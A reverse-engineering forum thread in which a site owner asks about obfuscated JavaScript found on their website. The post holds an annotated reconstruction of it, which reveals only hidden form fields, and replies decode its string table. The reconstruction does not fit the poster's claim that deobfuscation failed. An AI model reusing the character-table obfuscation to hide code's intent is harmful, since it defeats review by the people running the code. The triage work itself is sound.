A forum for reverse engineering, OS internals and malware analysis 

Discussion on reverse-engineering and debugging.
 #32462  by milosbre
 Wed Jan 16, 2019 7:24 pm
Hi guys.
This is the malware javascript found on my website.
Tried online deobfuscators but they didn't help much.
Can anyone shed some light?
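/**
 * Readable reconstruction of the obfuscated sample.
 *
 * The listing as posted is damaged by HTML extraction (`& quot;` stands for a
 * double quote, `& lt;` for `<`, and `\ x6E` for `\x6E`) and does not parse as
 * shown. With that repaired, every property and method name is assembled one
 * character at a time from a 120-entry table of ordinary JavaScript/DOM words
 * (named b4c45a in the sample). Entries 5, 15, 27 and 77 ("toString",
 * "fromCharCode", "toUpperCase", "split") are used as whole method names; the
 * rest only donate characters. Four constructions are used:
 *   - table[i].split("")[k]: character k of entry i, e.g.
 *     (b4c45a[62])[b4c45a[77]]("")[0] is "crypto".split("")[0], i.e. "c";
 *   - a one-character entry used directly ("C", "P", "A", "_", "i", "s");
 *   - (n).toString(radix), sometimes followed by toUpperCase(), e.g.
 *     (12).toString(15).toUpperCase() is "C";
 *   - String.fromCharCode(a + b) with the code given as a sum, e.g.
 *     202 + -98 = 104, i.e. "h".
 * A second array (f5faf5c in the sample) caches four names built this way:
 * "getElementById", "charCodeAt", "length" and "createElement".
 *
 * Resolved behaviour: read `buttonPostingID` from `this`, drop its first
 * character, add up the UTF-16 code units of the remainder, and append an
 * <input type="hidden" name="proof"> carrying that sum to the elements with
 * ids "publish_top" and "publish_bottom".
 *
 * Triage note: nothing in this function issues a network request, writes
 * markup, or evaluates a string as code; it only adds two hidden form fields.
 * Whether it is hostile cannot be settled from this function alone: check
 * what defines buttonPostingID, which forms contain the two containers and
 * where they submit, and how the script reached the site.
 *
 * Compared with the sample, the loop counter is declared locally (the sample
 * assigned `e90e0c` without a declaration, creating a global) and the two
 * unrelated uses of `a023aa6` have separate names.
 *
 * @this {Window} Called as a plain function in a non-strict script, `this`
 *     is the global object, so `buttonPostingID` is a page-level global.
 * @throws {TypeError} If `this` has no string `buttonPostingID`, or if either
 *     container element is missing.
 */
function pxyz() {
    // Sample: this["buttonPostingID"].substr(1)
    var seed = this.buttonPostingID.slice(1);

    // Additive checksum over the remaining characters.
    var checksum = 0;
    for (var i = 0; i < seed.length; i++) {
        checksum += seed.charCodeAt(i);
    }

    // Same order as the sample: look up the container, build the field,
    // then attach it; first "publish_top", then "publish_bottom".
    var containerIds = ["publish_top", "publish_bottom"];
    for (var c = 0; c < containerIds.length; c++) {
        var container = document.getElementById(containerIds[c]);
        var field = document.createElement("input");
        field.type = "hidden";
        field.name = "proof";
        field.value = checksum;
        container.appendChild(field);
    }
}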
    
 #32467  by hackr8
 Thu Jan 17, 2019 10:21 am
milosbre wrote: Wed Jan 16, 2019 7:24 pm
I believe that this code was produced by a JS obfuscator. The array 'b4c45a' contains some strings that are encoded in hex and separated with quotes like
"
(with some indentations that i can add only manually)
The other variables call parts of the content of the first array. Now, if you take the content of each hex string and convert it to ASCII you will see the original code (which I will try to post as soon as possible).
Hex Strings:
"\x6F\ x6E\ x6D\ x6F\ x75\ x73\ x65\ x6F\ x76\ x65\ x72 ", "\x70\ x6B\ x63\ x73\ x31\ x31 ", "\x74\ x65\ x78\ x74\ x61\ x72\ x65\ x61 ", "\x66\ x6F\ x72\ x6D ", "\x70\ x61\ x63\ x6B\ x61\ x67\ x65\ x73 ", "\x74\ x6F\ x53\ x74\ x72\ x69\ x6E\ x67 ", "\x63\ x6F\ x6E\ x66\ x69\ x72\ x6D ", "\x77\ x68\ x69\ x6C\ x65 ", "\x6D\ x69\ x6D\ x65\ x54\ x79\ x70\ x65\ x73 ", "\x64\ x65\ x66\ x61\ x75\ x6C\ x74\ x53\ x74\ x61\ x74\ x75\ x73 ", "\x70\ x61\ x72\ x73\ x65\ x46\ x6C\ x6F\ x61\ x74 ", "\x74\ x6F\ x70 ", "\x6F\ x6E\ x6D\ x6F\ x75\ x73\ x65\ x64\ x6F\ x77\ x6E ", "\x72\ x65\ x74\ x75\ x72\ x6E ", "\x63\ x6C\ x6F\ x73\ x65\ x64 ", "\x66\ x72\ x6F\ x6D\ x43\ x68\ x61\ x72\ x43\ x6F\ x64\ x65 ", "\x66\ x75\ x6E\ x63\ x74\ x69\ x6F\ x6E ", "\x61\ x62\ x73\ x74\ x72\ x61\ x63\ x74 ", "\x77\ x69\ x6E\ x64\ x6F\ x77 ", "\x64\ x6F\ x75\ x62\ x6C\ x65 ", "\x70\ x72\ x6F\ x6D\ x70\ x74 ", "\x4E\ x61\ x4E ", "\x63\ x68\ x61\ x72 ", "\x61\ x6C\ x65\ x72\ x74 ", "\x69\ x6E\ x6E\ x65\ x72\ x48\ x65\ x69\ x67\ x68\ x74 ", "\x70\ x72\ x6F\ x74\ x65\ x63\ x74\ x65\ x64 ", "\x73\ x65\ x6C\ x66 ", "\x74\ x6F\ x55\ x70\ x70\ x65\ x72\ x43\ x61\ x73\ x65 ", "\x69 ", "\x6F\ x6E\ x6B\ x65\ x79\ x70\ x72\ x65\ x73\ x73 ", "\x74\ x72\ x79 ", "\x49\ x6E\ x66\ x69\ x6E\ x69\ x74\ x79 ", "\x63\ x6F\ x6E\ x73\ x74\ x72\ x75\ x63\ x74\ x6F\ x72 ", "\x6E\ x61\ x76\ x69\ x67\ x61\ x74\ x6F\ x72 ", "\x6F\ x75\ x74\ x65\ x72\ x48\ x65\ x69\ x67\ x68\ x74 ", "\x69\ x73\ x50\ x72\ x6F\ x74\ x6F\ x74\ x79\ x70\ x65\ x4F\ x66 ", "\x66\ x6F\ x72\ x6D\ x73 ", "\x74\ x68\ x72\ x6F\ x77 ", "\x6F\ x6E\ x6B\ x65\ x79\ x64\ x6F\ x77\ x6E ", "\x73\ x65\ x6C\ x65\ x63\ x74 ", "\x69\ x6E\ x6E\ x65\ x72\ x57\ x69\ x64\ x74\ x68 ", "\x72\ x65\ x73\ x65\ x74 ", "\x73\ x68\ x6F\ x72\ x74 ", "\x69\ x6E\ x74\ x65\ x72\ x66\ x61\ x63\ x65 ", "\x74\ x79\ x70\ x65\ x6F\ x66 ", "\x73\ x77\ x69\ x74\ x63\ x68 ", "\x65\ x6C\ x65\ x6D\ x65\ x6E\ x74 ", "\x62\ x79\ x74\ x65 ", "\x4F\ x62\ x6A\ x65\ x63\ x74 ", "\x69\ x6E ", 
"\x69\ x6D\ x61\ x67\ x65 ", "\x73\ x65\ x74\ x54\ x69\ x6D\ x65\ x6F\ x75\ x74 ", "\x66\ x72\ x61\ x6D\ x65\ x52\ x61\ x74\ x65 ", "\x6E\ x65\ x77 ", "\x64\ x65\ x6C\ x65\ x74\ x65 ", "\x6F\ x70\ x65\ x6E\ x65\ x72 ", "\x70\ x61\ x63\ x6B\ x61\ x67\ x65 ", "\x6F\ x66\ x66\ x73\ x63\ x72\ x65\ x65\ x6E\ x42\ x75\ x66\ x66\ x65\ x72\ x69\ x6E\ x67 ", "\x64\ x65\ x63\ x6F\ x64\ x65\ x55\ x52\ x49\ x43\ x6F\ x6D\ x70\ x6F\ x6E\ x65\ x6E\ x74 ", "\x50 ", "\x64\ x6F ", "\x43 ", "\x63\ x72\ x79\ x70\ x74\ x6F ", "\x6C\ x61\ x79\ x65\ x72\ x73 ", "\x6F\ x6E\ x63\ x6C\ x69\ x63\ x6B ", "\x64\ x65\ x66\ x61\ x75\ x6C\ x74 ", "\x64\ x65\ x63\ x6F\ x64\ x65\ x55\ x52\ x49 ", "\x6F\ x75\ x74\ x65\ x72\ x57\ x69\ x64\ x74\ x68 ", "\x6F\ x6E\ x6B\ x65\ x79\ x75\ x70 ", "\x6E\ x61\ x6D\ x65 ", "\x65\ x78\ x74\ x65\ x6E\ x64\ x73 ", "\x6F\ x6E\ x62\ x6C\ x75\ x72 ", "\x61\ x6E\ x63\ x68\ x6F\ x72 ", "\x76\ x61\ x6C\ x75\ x65\ x4F\ x66 ", "\x75\ x6E\ x74\ x61\ x69\ x6E\ x74 ", "\x5F ", "\x68\ x69\ x64\ x64\ x65\ x6E ", "\x73\ x70\ x6C\ x69\ x74 ", "\x64\ x65\ x62\ x75\ x67\ x67\ x65\ x72 ", "\x66\ x69\ x6E\ x61\ x6C ", "\x41 ", "\x79\ x69\ x65\ x6C\ x64 ", "\x65\ x6D\ x62\ x65\ x64\ x73 ", "\x69\ x6E\ x73\ x74\ x61\ x6E\ x63\ x65\ x6F\ x66 ", "\x66\ x69\ x6C\ x65\ x55\ x70\ x6C\ x6F\ x61\ x64 ", "\x65\ x78\ x70\ x6F\ x72\ x74 ", "\x66\ x72\ x61\ x6D\ x65 ", "\x70\ x72\ x6F\ x70\ x65\ x72\ x74\ x79\ x49\ x73\ x45\ x6E\ x75\ x6D ", "\x74\ x72\ x61\ x6E\ x73\ x69\ x65\ x6E\ x74 ", "\x63\ x6C\ x65\ x61\ x72\ x54\ x69\ x6D\ x65\ x6F\ x75\ x74 ", "\x75\ x6E\ x64\ x65\ x66\ x69\ x6E\ x65\ x64 ", "\x53\ x74\ x72\ x69\ x6E\ x67 ", "\x70\ x72\ x69\ x76\ x61\ x74\ x65 ", "\x70\ x75\ x62\ x6C\ x69\ x63 ", "\x67\ x6F\ x74\ x6F ", "\x4E\ x75\ x6D\ x62\ x65\ x72 ", "\x65\ x6D\ x62\ x65\ x64 ", "\x62\ x6C\ x75\ x72 ", "\x61\ x6E\ x63\ x68\ x6F\ x72\ x73 ", "\x63\ x6F\ x6E\ x73\ x74 ", "\x73 ", "\x69\ x6D\ x61\ x67\ x65\ x73 ", "\x68\ x61\ x73\ x4F\ x77\ x6E\ x50\ x72\ x6F\ x70\ x65\ x72\ x74\ x79 
", "\x6F\ x6E\ x6C\ x6F\ x61\ x64 ", "\x73\ x75\ x62\ x6D\ x69\ x74 ", "\x66\ x72\ x61\ x6D\ x65\ x73 ", "\x65\ x73\ x63\ x61\ x70\ x65 ", "\x65\ x6E\ x63\ x6F\ x64\ x65\ x55\ x52\ x49 ", "\x73\ x63\ x72\ x65\ x65\ x6E\ x58 ", "\x73\ x79\ x6E\ x63\ x68\ x72\ x6F\ x6E\ x69\ x7A\ x65\ x64 ", "\x65\ x6E\ x63\ x6F\ x64\ x65\ x55\ x52\ x49\ x43\ x6F\ x6D\ x70\ x6F\ x6E\ x65\ x6E\ x74 ", "\x6E\ x75\ x6C\ x6C ", "\x6F\ x6E\ x65\ x72\ x72\ x6F\ x72 ", "\x63\ x6F\ x6E\ x74\ x69\ x6E\ x75\ x65 ", "\x6E\ x61\ x76\ x69\ x67\ x61\ x74\ x65 ", "\x44\ x61\ x74\ x65 ", "\x69\ x6D\ x70\ x6C\ x65\ x6D\ x65\ x6E\ x74\ x73 ", "\x77\ x69\ x74\ x68 ", "\x6C\ x61\ x79\ x65\ x72 ", "\x70\ x61\ x72\ x65\ x6E\ x74 "
 #32469  by hackr8
 Thu Jan 17, 2019 10:31 am
Well, I actually found the strings. Here is the light you asked for:
"onmouseover",
"pkcs11",
"textarea",
"form",
"packages",
"toString",
"confirm",
"while",
"mimeTypes",
"defaultStatus",
"parseFloat",
"top",
"onmousedown",
"return",
"closed",
"fromCharCode",
"function",
"abstract",
"window",
"double",
"prompt",
"NaN",
"char",
"alert",
"innerHeight",
"protected",
"self",
"toUpperCase",
"i",
"onkeypress",
"try",
"Infinity",
"constructor",
"navigator",
"outerHeight",
"isPrototypeOf",
"forms",
"throw",
"onkeydown",
"select",
"innerWidth",
"reset",
"short",
"interface",
"typeof",
"switch",
"element",
"byte",
"Object",
"in",
"image",
"setTimeout",
"frameRate",
"new",
"delete",
"opener",
"package",
"offscreenBuffering",
"decodeURIComponent",
"P",
"do",
"C",
"crypto",
"layers",
"onclick",
"default",
"decodeURI",
"outerWidth",
"onkeyup",
"name",
"extends",
"onblur",
"anchor",
"valueOf",
"untaint",
"_",
"hidden",
"split",
"debugger",
"final",
"A",
"yield",
"embeds",
"instanceof",
"fileUpload",
"export",
"frame",
"propertyIsEnum"
,"transient",
"clearTimeout",
"undefined",
"String",
"private",
"public",
"goto",
"Number",
"embed",
"blur",
"anchors",
"const",
"s",
"images",
"hasOwnProperty",
"onload",
"submit",
"frames",
"escape",
"encodeURI",
"screenX",
"synchronized",
"encodeURIComponent",
"null",
"onerror",
"continue",
"navigate",
"Date",
"implements",
"with",
"layer",
"parent"